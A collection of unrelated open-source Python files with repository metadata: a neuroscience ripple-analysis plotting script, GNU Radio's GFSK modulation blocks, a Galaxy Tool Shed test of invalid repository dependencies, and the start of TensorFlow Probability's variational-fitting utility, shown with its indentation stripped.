tmp = []
for i in range(len(angswr)):
a = np.unwrap(angswr[i])
b = pd.Series(index = times, data = a)
c = b.rolling(window = 10, win_type='gaussian', center=True, min_periods=1).mean(std=1.0)
tmp.append(np.abs(np.diff(c.values))/0.1)
tmp = pd.DataFrame(index = times[0:-1] + np.diff(times)/2, columns = rip_tsd.index.values.astype('int'), data = np.array(tmp).T)
swrvel.append(tmp)
swrvel = pd.concat(swrvel, 1)
swrrad = pd.concat(swrrad, 1)
swrvel = swrvel.sort_index(1)
swrrad = swrrad.sort_index(1)
s = f.split('-')[0]+'/'+ f.split('.')[0]
stab = anglehd[s]
# cutting between -500 to 500
stab = stab.loc[-500:500]
# aligning swrrad.index to stab.index
newswrrad = []
for i in swrrad.columns:
y = swrrad[i].values
if len(y.shape) ==2 :
print("Bug in ", f)
y = y[:,0]
fi = scipy.interpolate.interp1d(swrrad.index.values, y)
newswrrad.append(fi(stab.index.values))
newswrrad = pd.DataFrame(index = stab.index.values, columns = swrrad.columns, data = np.array(newswrrad).T)
newswrvel = []
for i in swrvel.columns:
y = swrvel[i].values
if len(y.shape) ==2 :
y = y[:,0]
fi = scipy.interpolate.interp1d(swrvel.index.values, y)
newswrvel.append(fi(stab.index.values))
newswrvel = pd.DataFrame(index = stab.index.values, columns = swrvel.columns, data = np.array(newswrvel).T)
radius.append(newswrrad.mean(1))
stability.append(stab.mean(1))
velocity.append(newswrvel.mean(1))
order.append(f)
radius = pd.concat(radius, 1)
stability = pd.concat(stability, 1)
velocity = pd.concat(velocity, 1)
velocity =
stability = stability.apply(scipy.stats.zscore)
radius = radius.apply(scipy.stats.zscore)
velocity = velocity.apply(scipy.stats.zscore)
figure()
subplot(231)
for i in radius.columns:
plot(radius[i])
title("Radius")
subplot(232)
for i in velocity.columns:
plot(velocity[i])
title("Ang velocity")
subplot(233)
for i in stability.columns:
plot(stability[i])
title("Stability")
subplot(234)
for i in radius.columns:
scatter(radius[i], stability[i])
xlabel("Radius")
ylabel("Stability")
subplot(235)
for i in radius.columns:
scatter(velocity[i], stability[i])
xlabel("velocity")
ylabel("Stability")
tosave = {'velocity':velocity,
'radius':radius}
show()
sys.exit()
store = pd.HDFStore('../figures/figures_articles_v4/figure2/test.h5')
if normed:
store.append('anglehd_normed', anglehd)
store.append('anglenohd_normed', anglenohd)
else:
store.append('anglehd', anglehd)
store.append('anglenohd', anglenohd)
store.close()
figure()
store = pd.HDFStore('../figures/figures_articles_v4/figure2/test.h5')
subplot(2,2,1)
plot(store['anglehd'].mean(1), label = 'HD')
plot(store['anglenohd'].mean(1), label = 'non-HD')
legend()
title("Scalar Product")
subplot(2,2,2)
plot(store['pearsonhd'].mean(1), label = 'HD')
plot(store['pearsonnohd'].mean(1), label = 'non-HD')
legend()
title("Pearson Correlation")
subplot(2,2,3)
plot(store['anglehd_normed'].mean(1), label = 'HD')
plot(store['anglenohd_normed'].mean(1), label = 'non-HD')
legend()
title("Scalar Product normalized")
subplot(2,2,4)
plot(store['pearsonhd_normed'].mean(1), label = 'HD')
plot(store['pearsonnohd_normed'].mean(1), label = 'non-HD')
legend()
title("Pearson Correlation normalized")
show()
sys.exit()
anglehd = pd.DataFrame.from_dict(anglehd)
anglenohd = pd.DataFrame.from_dict(anglenohd)
plot(anglehd.mean(1), label = 'hd')
plot(anglenohd.mean(1), label = 'nohd')
legend()
show()
sys.exit()
datatosave = cPickle.load(open("/mnt/DataGuillaume/MergedData/SWR_SCALAR_PRODUCT.pickle", 'rb'))
angleall = datatosave['cosalpha']
baselineall = datatosave['baseline']
hd = pd.DataFrame()
for s in angleall.keys():
if 'hd' in list(angleall[s].keys()):
tmp1 = angleall[s]['hd'].rolling(window=100,win_type='gaussian',center=True,min_periods=1, axis = 0).mean(std=0.5)
tmp2 = baselineall[s]['hd'].rolling(window=100,win_type='gaussian',center=True,min_periods=1, axis = 0).mean(std=0.5)
tmp = (tmp1.mean(1) - tmp2.mean(1))/tmp2.mean(1)
hd[s.split("/")[1]] = tmp
nohd = pd.DataFrame()
for s in angleall.keys():
if 'nohd' in list(angleall[s].keys()):
tmp1 = angleall[s]['nohd'].rolling(window=100,win_type='gaussian',center=True,min_periods=1, axis = 0).mean(std=1)
tmp2 = baselineall[s]['nohd'].rolling(window=100,win_type='gaussian',center=True,min_periods=1, axis = 0).mean(std=1)
tmp = (tmp1.mean(1) - tmp2.mean(1))/tmp2.mean(1)
nohd[s.split("/")[1]] = tmp
data = pd.DataFrame(index = hd.index.values, columns = pd.MultiIndex.from_product([['hd', 'nohd'], ['mean', 'sem']]))
data['hd', 'mean'] = hd.mean(1)
data['hd', 'sem'] = hd.sem(1)
data['nohd', 'mean'] = nohd.mean(1)
data['nohd', 'sem'] = nohd.sem(1)
data.to_hdf("../figures/figures_articles_v4/figure2/SWR_SCALAR_PRODUCT.h5", 'w')
subplot(111)
m = hd.mean(1)
v = hd.sem(1)
plot(hd.mean(1), label = 'hd')
fill_between(hd.index.values, m+v, m-v, alpha = 0.5)
# title("Only hd")
# subplot(212)
# title("No hd")
m = nohd.mean(1)
v = nohd.sem(1)
plot(nohd.mean(1), label = 'nohd')
fill_between(nohd.index.values, m+v, m-v, alpha = 0.5)
legend()
figure()
subplot(121)
plot(hd, color = 'grey')
plot(hd.mean(1), color = 'red')
title("HD")
subplot(122)
plot(nohd, color = 'grey')
plot(nohd.mean(1), color = 'black')
title("No HD")
show()
|
gviejo/ThalamusPhysio
|
python/main_make_SWS_scalar_product.py
|
Python
|
gpl-3.0
| 14,308
|
[
"Gaussian"
] |
a30ff515be9adcb8aa14f7103d3361dbf84bf50414006f9d98c03bb5e437024b
|
#
# GFSK modulation and demodulation.
#
#
# Copyright 2005-2007,2012 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
#
# See gnuradio-examples/python/digital for examples
import numpy
from gnuradio import gr
from gnuradio import analog
from gnuradio import blocks, filter
from . import modulation_utils
from . import digital_python as digital
# default values (used in __init__ and add_options)
_def_samples_per_symbol = 2
_def_sensitivity = 1
_def_bt = 0.35
_def_verbose = False
_def_log = False
_def_gain_mu = None
_def_mu = 0.5
_def_freq_error = 0.0
_def_omega_relative_limit = 0.005
# FIXME: Figure out how to make GFSK work with pfb_arb_resampler_fff for both
# transmit and receive so we don't require integer samples per symbol.
# /////////////////////////////////////////////////////////////////////////////
# GFSK modulator
# /////////////////////////////////////////////////////////////////////////////
class gfsk_mod(gr.hier_block2):
def __init__(self,
samples_per_symbol=_def_samples_per_symbol,
sensitivity=_def_sensitivity,
bt=_def_bt,
verbose=_def_verbose,
log=_def_log):
"""
Hierarchical block for Gaussian Frequency Shift Key (GFSK)
modulation.
The input is a byte stream (unsigned char) and the
output is the complex modulated signal at baseband.
Args:
samples_per_symbol: samples per baud >= 2 (integer)
bt: Gaussian filter bandwidth * symbol time (float)
verbose: Print information about modulator? (bool)
debug: Print modualtion data to files? (bool)
"""
gr.hier_block2.__init__(self, "gfsk_mod",
gr.io_signature(1, 1, gr.sizeof_char), # Input signature
gr.io_signature(1, 1, gr.sizeof_gr_complex)) # Output signature
samples_per_symbol = int(samples_per_symbol)
self._samples_per_symbol = samples_per_symbol
self._bt = bt
self._differential = False
if not isinstance(samples_per_symbol, int) or samples_per_symbol < 2:
raise TypeError("samples_per_symbol must be an integer >= 2, is %r" % (samples_per_symbol,))
ntaps = 4 * samples_per_symbol # up to 3 bits in filter at once
#sensitivity = (pi / 2) / samples_per_symbol # phase change per bit = pi / 2
# Turn it into NRZ data.
#self.nrz = digital.bytes_to_syms()
self.unpack = blocks.packed_to_unpacked_bb(1, gr.GR_MSB_FIRST)
self.nrz = digital.chunks_to_symbols_bf([-1, 1])
# Form Gaussian filter
# Generate Gaussian response (Needs to be convolved with window below).
self.gaussian_taps = filter.firdes.gaussian(
1.0, # gain
samples_per_symbol, # symbol_rate
bt, # bandwidth * symbol time
ntaps # number of taps
)
self.sqwave = (1,) * samples_per_symbol # rectangular window
self.taps = numpy.convolve(numpy.array(self.gaussian_taps),numpy.array(self.sqwave))
self.gaussian_filter = filter.interp_fir_filter_fff(samples_per_symbol, self.taps)
# FM modulation
self.fmmod = analog.frequency_modulator_fc(sensitivity)
# small amount of output attenuation to prevent clipping USRP sink
self.amp = blocks.multiply_const_cc(0.999)
if verbose:
self._print_verbage()
if log:
self._setup_logging()
# Connect & Initialize base class
self.connect(self, self.unpack, self.nrz, self.gaussian_filter, self.fmmod, self.amp, self)
def samples_per_symbol(self):
return self._samples_per_symbol
@staticmethod
def bits_per_symbol(self=None): # staticmethod that's also callable on an instance
return 1
def _print_verbage(self):
print("bits per symbol = %d" % self.bits_per_symbol())
print("Gaussian filter bt = %.2f" % self._bt)
def _setup_logging(self):
print("Modulation logging turned on.")
self.connect(self.nrz,
blocks.file_sink(gr.sizeof_float, "nrz.dat"))
self.connect(self.gaussian_filter,
blocks.file_sink(gr.sizeof_float, "gaussian_filter.dat"))
self.connect(self.fmmod,
blocks.file_sink(gr.sizeof_gr_complex, "fmmod.dat"))
@staticmethod
def add_options(parser):
"""
Adds GFSK modulation-specific options to the standard parser
"""
parser.add_option("", "--bt", type="float", default=_def_bt,
help="set bandwidth-time product [default=%default] (GFSK)")
@staticmethod
def extract_kwargs_from_options(options):
"""
Given command line options, create dictionary suitable for passing to __init__
"""
return modulation_utils.extract_kwargs_from_options(gfsk_mod.__init__,
('self',), options)
# /////////////////////////////////////////////////////////////////////////////
# GFSK demodulator
# /////////////////////////////////////////////////////////////////////////////
class gfsk_demod(gr.hier_block2):
def __init__(self,
samples_per_symbol=_def_samples_per_symbol,
sensitivity=_def_sensitivity,
gain_mu=_def_gain_mu,
mu=_def_mu,
omega_relative_limit=_def_omega_relative_limit,
freq_error=_def_freq_error,
verbose=_def_verbose,
log=_def_log):
"""
Hierarchical block for Gaussian Minimum Shift Key (GFSK)
demodulation.
The input is the complex modulated signal at baseband.
The output is a stream of bits packed 1 bit per byte (the LSB)
Args:
samples_per_symbol: samples per baud (integer)
verbose: Print information about modulator? (bool)
log: Print modualtion data to files? (bool)
Clock recovery parameters. These all have reasonable defaults.
Args:
gain_mu: controls rate of mu adjustment (float)
mu: fractional delay [0.0, 1.0] (float)
omega_relative_limit: sets max variation in omega (float, typically 0.000200 (200 ppm))
freq_error: bit rate error as a fraction
float:
"""
gr.hier_block2.__init__(self, "gfsk_demod",
gr.io_signature(1, 1, gr.sizeof_gr_complex), # Input signature
gr.io_signature(1, 1, gr.sizeof_char)) # Output signature
self._samples_per_symbol = samples_per_symbol
self._gain_mu = gain_mu
self._mu = mu
self._omega_relative_limit = omega_relative_limit
self._freq_error = freq_error
self._differential = False
if samples_per_symbol < 2:
raise TypeError("samples_per_symbol >= 2, is %f" % samples_per_symbol)
self._omega = samples_per_symbol*(1+self._freq_error)
if not self._gain_mu:
self._gain_mu = 0.175
self._gain_omega = .25 * self._gain_mu * self._gain_mu # critically damped
# Demodulate FM
#sensitivity = (pi / 2) / samples_per_symbol
self.fmdemod = analog.quadrature_demod_cf(1.0 / sensitivity)
# the clock recovery block tracks the symbol clock and resamples as needed.
# the output of the block is a stream of soft symbols (float)
self.clock_recovery = digital.clock_recovery_mm_ff(self._omega, self._gain_omega,
self._mu, self._gain_mu,
self._omega_relative_limit)
# slice the floats at 0, outputting 1 bit (the LSB of the output byte) per sample
self.slicer = digital.binary_slicer_fb()
if verbose:
self._print_verbage()
if log:
self._setup_logging()
# Connect & Initialize base class
self.connect(self, self.fmdemod, self.clock_recovery, self.slicer, self)
def samples_per_symbol(self):
return self._samples_per_symbol
@staticmethod
def bits_per_symbol(self=None): # staticmethod that's also callable on an instance
return 1
def _print_verbage(self):
print("bits per symbol = %d" % self.bits_per_symbol())
print("M&M clock recovery omega = %f" % self._omega)
print("M&M clock recovery gain mu = %f" % self._gain_mu)
print("M&M clock recovery mu = %f" % self._mu)
print("M&M clock recovery omega rel. limit = %f" % self._omega_relative_limit)
print("frequency error = %f" % self._freq_error)
def _setup_logging(self):
print("Demodulation logging turned on.")
self.connect(self.fmdemod,
blocks.file_sink(gr.sizeof_float, "fmdemod.dat"))
self.connect(self.clock_recovery,
blocks.file_sink(gr.sizeof_float, "clock_recovery.dat"))
self.connect(self.slicer,
blocks.file_sink(gr.sizeof_char, "slicer.dat"))
@staticmethod
def add_options(parser):
"""
Adds GFSK demodulation-specific options to the standard parser
"""
parser.add_option("", "--gain-mu", type="float", default=_def_gain_mu,
help="M&M clock recovery gain mu [default=%default] (GFSK/PSK)")
parser.add_option("", "--mu", type="float", default=_def_mu,
help="M&M clock recovery mu [default=%default] (GFSK/PSK)")
parser.add_option("", "--omega-relative-limit", type="float", default=_def_omega_relative_limit,
help="M&M clock recovery omega relative limit [default=%default] (GFSK/PSK)")
parser.add_option("", "--freq-error", type="float", default=_def_freq_error,
help="M&M clock recovery frequency error [default=%default] (GFSK)")
@staticmethod
def extract_kwargs_from_options(options):
"""
Given command line options, create dictionary suitable for passing to __init__
"""
return modulation_utils.extract_kwargs_from_options(gfsk_demod.__init__,
('self',), options)
#
# Add these to the mod/demod registry
#
modulation_utils.add_type_1_mod('gfsk', gfsk_mod)
modulation_utils.add_type_1_demod('gfsk', gfsk_demod)
|
trabucayre/gnuradio
|
gr-digital/python/digital/gfsk.py
|
Python
|
gpl-3.0
| 10,789
|
[
"Gaussian"
] |
43b463174f42236c3a97261e77dc45ed3d35ed09e2c653cdb8a27ee6cf4c1de7
|
from tool_shed.base.twilltestcase import ShedTwillTestCase, common, os
datatypes_repository_name = 'emboss_datatypes_0110'
datatypes_repository_description = "Galaxy applicable data formats used by Emboss tools."
datatypes_repository_long_description = "Galaxy applicable data formats used by Emboss tools. This repository contains no tools."
emboss_repository_name = 'emboss_0110'
emboss_repository_description = 'Galaxy wrappers for Emboss version 5.0.0 tools'
emboss_repository_long_description = 'Galaxy wrappers for Emboss version 5.0.0 tools'
category_name = 'Test 0110 Invalid Repository Dependencies'
category_desc = 'Test 0110 Invalid Repository Dependencies'
running_standalone = False
class TestBasicRepositoryDependencies( ShedTwillTestCase ):
'''Testing emboss 5 with repository dependencies.'''
def test_0000_initiate_users( self ):
"""Create necessary user accounts and login as an admin user."""
self.logout()
self.login( email=common.test_user_1_email, username=common.test_user_1_name )
test_user_1 = self.test_db_util.get_user( common.test_user_1_email )
assert test_user_1 is not None, 'Problem retrieving user with email %s from the database' % common.test_user_1_email
test_user_1_private_role = self.test_db_util.get_private_role( test_user_1 )
self.logout()
self.login( email=common.admin_email, username=common.admin_username )
admin_user = self.test_db_util.get_user( common.admin_email )
assert admin_user is not None, 'Problem retrieving user with email %s from the database' % common.admin_email
admin_user_private_role = self.test_db_util.get_private_role( admin_user )
def test_0005_create_category( self ):
"""Create a category for this test suite"""
self.create_category( name=category_name, description=category_desc )
def test_0010_create_emboss_datatypes_repository_and_upload_tarball( self ):
'''Create and populate the emboss_datatypes repository.'''
global running_standalone
self.logout()
self.login( email=common.test_user_1_email, username=common.test_user_1_name )
category = self.test_db_util.get_category_by_name( category_name )
repository = self.get_or_create_repository( name=datatypes_repository_name,
description=datatypes_repository_description,
long_description=datatypes_repository_long_description,
owner=common.test_user_1_name,
category_id=self.security.encode_id( category.id ),
strings_displayed=[] )
if self.repository_is_new( repository ):
running_standalone = True
self.upload_file( repository,
filename='emboss/datatypes/datatypes_conf.xml',
filepath=None,
valid_tools_only=True,
uncompress_file=True,
remove_repo_files_not_in_tar=False,
commit_message='Uploaded datatypes_conf.xml.',
strings_displayed=[],
strings_not_displayed=[] )
def test_0015_verify_datatypes_in_datatypes_repository( self ):
'''Verify that the emboss_datatypes repository contains datatype entries.'''
repository = self.test_db_util.get_repository_by_name_and_owner( datatypes_repository_name, common.test_user_1_name )
self.display_manage_repository_page( repository, strings_displayed=[ 'Datatypes', 'equicktandem', 'hennig86', 'vectorstrip' ] )
def test_0020_create_emboss_5_repository_and_upload_files( self ):
'''Create and populate the emboss_5_0110 repository.'''
global running_standalone
if running_standalone:
category = self.test_db_util.get_category_by_name( category_name )
repository = self.get_or_create_repository( name=emboss_repository_name,
description=emboss_repository_description,
long_description=emboss_repository_long_description,
owner=common.test_user_1_name,
category_id=self.security.encode_id( category.id ),
strings_displayed=[] )
self.upload_file( repository,
filename='emboss/emboss.tar',
filepath=None,
valid_tools_only=True,
uncompress_file=True,
remove_repo_files_not_in_tar=False,
commit_message='Uploaded emboss tool tarball.',
strings_displayed=[],
strings_not_displayed=[] )
def test_0025_generate_repository_dependency_with_invalid_url( self ):
'''Generate a repository dependency for emboss 5 with an invalid URL.'''
global running_standalone
if running_standalone:
dependency_path = self.generate_temp_path( 'test_1110', additional_paths=[ 'simple' ] )
xml_filename = self.get_filename( 'repository_dependencies.xml', filepath=dependency_path )
datatypes_repository = self.test_db_util.get_repository_by_name_and_owner( datatypes_repository_name, common.test_user_1_name )
emboss_repository = self.test_db_util.get_repository_by_name_and_owner( emboss_repository_name, common.test_user_1_name )
url = 'http://http://this is not an url!'
name = datatypes_repository.name
owner = datatypes_repository.user.username
changeset_revision = self.get_repository_tip( datatypes_repository )
strings_displayed = [ 'Repository dependencies are currently supported only within the same tool shed' ]
repository_tuple = ( url, name, owner, changeset_revision )
self.create_repository_dependency( repository=emboss_repository,
filepath=dependency_path,
repository_tuples=[ repository_tuple ],
strings_displayed=strings_displayed,
complex=False )
def test_0030_generate_repository_dependency_with_invalid_name( self ):
'''Generate a repository dependency for emboss 5 with an invalid name.'''
global running_standalone
if running_standalone:
dependency_path = self.generate_temp_path( 'test_1110', additional_paths=[ 'simple' ] )
xml_filename = self.get_filename( 'repository_dependencies.xml', filepath=dependency_path )
repository = self.test_db_util.get_repository_by_name_and_owner( datatypes_repository_name, common.test_user_1_name )
emboss_repository = self.test_db_util.get_repository_by_name_and_owner( emboss_repository_name, common.test_user_1_name )
url = self.url
name = '!?invalid?!'
owner = repository.user.username
changeset_revision = self.get_repository_tip( repository )
strings_displayed = [ 'because the name is invalid.' ]
repository_tuple = ( url, name, owner, changeset_revision )
self.create_repository_dependency( repository=emboss_repository,
filepath=dependency_path,
repository_tuples=[ repository_tuple ],
strings_displayed=strings_displayed,
complex=False )
def test_0035_generate_repository_dependency_with_invalid_owner( self ):
'''Generate a repository dependency for emboss 5 with an invalid owner.'''
global running_standalone
if running_standalone:
dependency_path = self.generate_temp_path( 'test_1110', additional_paths=[ 'simple' ] )
xml_filename = self.get_filename( 'repository_dependencies.xml', filepath=dependency_path )
repository = self.test_db_util.get_repository_by_name_and_owner( datatypes_repository_name, common.test_user_1_name )
emboss_repository = self.test_db_util.get_repository_by_name_and_owner( emboss_repository_name, common.test_user_1_name )
url = self.url
name = repository.name
owner = '!?invalid?!'
changeset_revision = self.get_repository_tip( repository )
strings_displayed = [ 'because the owner is invalid.' ]
repository_tuple = ( url, name, owner, changeset_revision )
self.create_repository_dependency( repository=emboss_repository,
filepath=dependency_path,
repository_tuples=[ repository_tuple ],
strings_displayed=strings_displayed,
complex=False )
def test_0040_generate_repository_dependency_with_invalid_changeset_revision( self ):
'''Generate a repository dependency for emboss 5 with an invalid changeset revision.'''
global running_standalone
if running_standalone:
dependency_path = self.generate_temp_path( 'test_1110', additional_paths=[ 'simple', 'invalid' ] )
xml_filename = self.get_filename( 'repository_dependencies.xml', filepath=dependency_path )
repository = self.test_db_util.get_repository_by_name_and_owner( datatypes_repository_name, common.test_user_1_name )
emboss_repository = self.test_db_util.get_repository_by_name_and_owner( emboss_repository_name, common.test_user_1_name )
url = self.url
name = repository.name
owner = repository.user.username
changeset_revision = '!?invalid?!'
strings_displayed = [ 'because the changeset revision is invalid.' ]
repository_tuple = ( url, name, owner, changeset_revision )
self.create_repository_dependency( repository=emboss_repository,
filepath=dependency_path,
repository_tuples=[ repository_tuple ],
strings_displayed=strings_displayed,
complex=False )
def test_0045_install_repository_with_invalid_repository_dependency( self ):
'''Install the repository and verify that galaxy detects invalid repository dependencies.'''
self.galaxy_logout()
self.galaxy_login( email=common.admin_email, username=common.admin_username )
repository = self.test_db_util.get_repository_by_name_and_owner( emboss_repository_name, common.test_user_1_name )
preview_strings_displayed = [ 'emboss_0110', self.get_repository_tip( repository ), 'Ignoring repository dependency definition' ]
self.install_repository( emboss_repository_name,
common.test_user_1_name,
category_name,
install_tool_dependencies=False,
install_repository_dependencies=True,
preview_strings_displayed=preview_strings_displayed,
post_submit_strings_displayed=[ repository.name, repository.name, 'New' ],
includes_tools_for_display_in_tool_panel=True )
installed_repository = self.test_db_util.get_installed_repository_by_name_owner( emboss_repository_name, common.test_user_1_name )
self.display_installed_repository_manage_page( installed_repository=installed_repository,
strings_displayed=[],
strings_not_displayed=[ 'Repository dependencies' ] )
|
mikel-egana-aranguren/SADI-Galaxy-Docker
|
galaxy-dist/test/tool_shed/functional/test_1110_install_repository_with_invalid_repository_dependency.py
|
Python
|
gpl-3.0
| 12,412
|
[
"Galaxy"
] |
0f26b1e7a45e37c765ecdb45a8c96633d7f13bf91b25a16cb899ce2af5629f1d
|
# Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Utilities for fitting variational distributions."""
import functools
import tensorflow.compat.v2 as tf
from tensorflow_probability.python import math as tfp_math
from tensorflow_probability.python.vi import csiszar_divergence
from tensorflow.python.util import deprecation # pylint: disable=g-direct-tensorflow-import
_trace_loss = lambda traceable_quantities: traceable_quantities.loss
def fit_surrogate_posterior_stateless(
target_log_prob_fn,
build_surrogate_posterior_fn,
initial_parameters,
optimizer,
num_steps,
convergence_criterion=None,
trace_fn=_trace_loss,
discrepancy_fn=csiszar_divergence.kl_reverse,
sample_size=1,
importance_sample_size=1,
gradient_estimator=csiszar_divergence.GradientEstimators.REPARAMETERIZATION,
jit_compile=False,
seed=None,
name='fit_surrogate_posterior'):
"""Fit a surrogate posterior to a target (unnormalized) log density.
The default behavior constructs and minimizes the negative variational
evidence lower bound (ELBO), given by
```python
q_samples = surrogate_posterior.sample(num_draws)
elbo_loss = -tf.reduce_mean(
target_log_prob_fn(q_samples) - surrogate_posterior.log_prob(q_samples))
```
This corresponds to minimizing the 'reverse' Kullback-Liebler divergence
(`KL[q||p]`) between the variational distribution and the unnormalized
`target_log_prob_fn`, and defines a lower bound on the marginal log
likelihood, `log p(x) >= -elbo_loss`. [1]
More generally, this function supports fitting variational distributions that
minimize any
[Csiszar f-divergence](https://en.wikipedia.org/wiki/F-divergence).
Args:
target_log_prob_fn: Python callable that takes a set of `Tensor` arguments
and returns a `Tensor` log-density. Given
`q_sample = surrogate_posterior.sample(sample_size)`, this
will be called as `target_log_prob_fn(*q_sample)` if `q_sample` is a list
or a tuple, `target_log_prob_fn(**q_sample)` if `q_sample` is a
dictionary, or `target_log_prob_fn(q_sample)` if `q_sample` is a `Tensor`.
It should support batched evaluation, i.e., should return a result of
shape `[sample_size]`.
build_surrogate_posterior_fn: Python `callable` that takes parameter values
and returns an instance of `tfd.Distribution`.
initial_parameters: List or tuple of initial parameter values (`Tensor`s or
structures of `Tensor`s), passed as positional arguments to
`build_surrogate_posterior_fn`.
optimizer: Pure functional optimizer to use. This may be an
`optax.GradientTransformation` instance (in JAX), or any similar object
that implements methods
`optimizer_state = optimizer.init(parameters)` and
`updates, optimizer_state = optimizer.update(grads, optimizer_state,
parameters)`.
num_steps: Python `int` number of steps to run the optimizer.
convergence_criterion: Optional instance of
`tfp.optimizer.convergence_criteria.ConvergenceCriterion`
representing a criterion for detecting convergence. If `None`,
the optimization will run for `num_steps` steps, otherwise, it will run
for at *most* `num_steps` steps, as determined by the provided criterion.
Default value: `None`.
trace_fn: Python callable with signature `traced_values = trace_fn(
traceable_quantities)`, where the argument is an instance of
`tfp.math.MinimizeTraceableQuantities` and the returned `traced_values`
may be a `Tensor` or nested structure of `Tensor`s. The traced values are
stacked across steps and returned.
The default `trace_fn` simply returns the loss. In general, trace
functions may also examine the gradients, values of parameters,
the state propagated by the specified `convergence_criterion`, if any (if
no convergence criterion is specified, this will be `None`).
Default value: `lambda traceable_quantities: traceable_quantities.loss`.
discrepancy_fn: Python `callable` representing a Csiszar `f` function in
in log-space. See the docs for `tfp.vi.monte_carlo_variational_loss` for
examples.
Default value: `tfp.vi.kl_reverse`.
sample_size: Python `int` number of Monte Carlo samples to use
in estimating the variational divergence. Larger values may stabilize
the optimization, but at higher cost per step in time and memory.
Default value: `1`.
importance_sample_size: Python `int` number of terms used to define an
importance-weighted divergence. If `importance_sample_size > 1`, then the
`surrogate_posterior` is optimized to function as an importance-sampling
proposal distribution. In this case, posterior expectations should be
approximated by importance sampling, as demonstrated in the example below.
Default value: `1`.
gradient_estimator: Optional element from `tfp.vi.GradientEstimators`
specifying the stochastic gradient estimator to associate with the
variational loss.
Default value: `csiszar_divergence.GradientEstimators.REPARAMETERIZATION`.
jit_compile: If True, compiles the loss function and gradient update using
XLA. XLA performs compiler optimizations, such as fusion, and attempts to
emit more efficient code. This may drastically improve the performance.
See the docs for `tf.function`. (In JAX, this will apply `jax.jit`).
Default value: `False`.
seed: PRNG seed; see `tfp.random.sanitize_seed` for details.
name: Python `str` name prefixed to ops created by this function.
Default value: 'fit_surrogate_posterior'.
Returns:
optimized_parameters: Tuple of optimized parameter values, with the same
structure and `Tensor` shapes as `initial_parameters`.
results: `Tensor` or nested structure of `Tensor`s, according to the return
type of `trace_fn`. Each `Tensor` has an added leading dimension of size
`num_steps`, packing the trajectory of the result over the course of the
optimization.
#### Examples
**Normal-Normal model**. We'll first consider a simple model
`z ~ N(0, 1)`, `x ~ N(z, 1)`, where we suppose we are interested in the
posterior `p(z | x=5)`:
```python
import tensorflow_probability as tfp
from tensorflow_probability import distributions as tfd
def log_prob(z, x):
return tfd.Normal(0., 1.).log_prob(z) + tfd.Normal(z, 1.).log_prob(x)
conditioned_log_prob = lambda z: log_prob(z, x=5.)
```
The posterior is itself normal by [conjugacy](
https://en.wikipedia.org/wiki/Conjugate_prior), and can be computed
analytically (it's `N(loc=5/2., scale=1/sqrt(2)`). But suppose we don't want
to bother doing the math: we can use variational inference instead!
```python
import optax # Requires JAX backend.
init_normal, build_normal = tfp.experimental.util.make_trainable_stateless(
tfd.Normal, name='q_z')
optimized_parameters, losses = tfp.vi.fit_surrogate_posterior_stateless(
conditioned_log_prob,
build_surrogate_posterior_fn=build_normal,
initial_parameters=init_normal(seed=(42, 42)),
optimizer=optax.adam(learning_rate=0.1),
num_steps=100,
seed=(42, 42))
q_z = build_normal(*optimized_parameters)
```
**Custom loss function**. Suppose we prefer to fit the same model using
the forward KL divergence `KL[p||q]`. We can pass a custom discrepancy
function:
```python
optimized_parameters, losses = tfp.vi.fit_surrogate_posterior_stateless(
conditioned_log_prob,
build_surrogate_posterior_fn=build_normal,
initial_parameters=init_normal(seed=(42, 42)),
optimizer=optax.adam(learning_rate=0.1),
num_steps=100,
seed=(42, 42),
discrepancy_fn=tfp.vi.kl_forward)
q_z = build_normal(*optimized_parameters)
```
Note that in practice this may have substantially higher-variance gradients
than the reverse KL.
**Importance weighting**. A surrogate posterior may be corrected by
interpreting it as a proposal for an [importance sampler](
https://en.wikipedia.org/wiki/Importance_sampling). That is, one can use
weighted samples from the surrogate to estimate expectations under the true
posterior:
```python
zs, q_log_prob = surrogate_posterior.experimental_sample_and_log_prob(
num_samples, seed=(42, 42))
# Naive expectation under the surrogate posterior.
expected_x = tf.reduce_mean(f(zs), axis=0)
# Importance-weighted estimate of the expectation under the true posterior.
self_normalized_log_weights = tf.nn.log_softmax(
target_log_prob_fn(zs) - q_log_prob)
expected_x = tf.reduce_sum(
tf.exp(self_normalized_log_weights) * f(zs),
axis=0)
```
Any distribution may be used as a proposal, but it is often natural to
consider surrogates that were themselves fit by optimizing an
importance-weighted variational objective [2], which directly optimizes the
surrogate's effectiveness as an proposal distribution. This may be specified
by passing `importance_sample_size > 1`. The importance-weighted objective
may favor different characteristics than the original objective.
For example, effective proposals are generally overdispersed, whereas a
surrogate optimizing reverse KL would otherwise tend to be underdispersed.
Although importance sampling is guaranteed to tighten the variational bound,
some research has found that this does not necessarily improve the quality
of deep generative models, because it also introduces gradient noise that can
lead to a weaker training signal [3]. As always, evaluation is important to
choose the approach that works best for a particular task.
When using an importance-weighted loss to fit a surrogate, it is also
recommended to apply importance sampling when computing expectations
under that surrogate.
```python
# Fit `q` with an importance-weighted variational loss.
optimized_parameters, losses = tfp.vi.fit_surrogate_posterior_stateless(
conditioned_log_prob,
build_surrogate_posterior_fn=build_normal,
initial_parameters=init_normal(seed=(42, 42)),
importance_sample_size=10,
optimizer=optax.adam(0.1),
num_steps=200,
seed=(42, 42))
q_z = build_normal(*optimized_parameters)
# Estimate posterior statistics with importance sampling.
zs, q_log_prob = q_z.experimental_sample_and_log_prob(1000, seed=(42, 42))
self_normalized_log_weights = tf.nn.log_softmax(
conditioned_log_prob(zs) - q_log_prob)
posterior_mean = tf.reduce_sum(
tf.exp(self_normalized_log_weights) * zs,
axis=0)
posterior_variance = tf.reduce_sum(
tf.exp(self_normalized_log_weights) * (zs - posterior_mean)**2,
axis=0)
```
**Inhomogeneous Poisson Process**. For a more interesting example, let's
consider a model with multiple latent variables as well as trainable
parameters in the model itself. Given observed counts `y` from spatial
locations `X`, consider an inhomogeneous Poisson process model
`log_rates = GaussianProcess(index_points=X); y = Poisson(exp(log_rates))`
in which the latent (log) rates are spatially correlated following a Gaussian
process:
```python
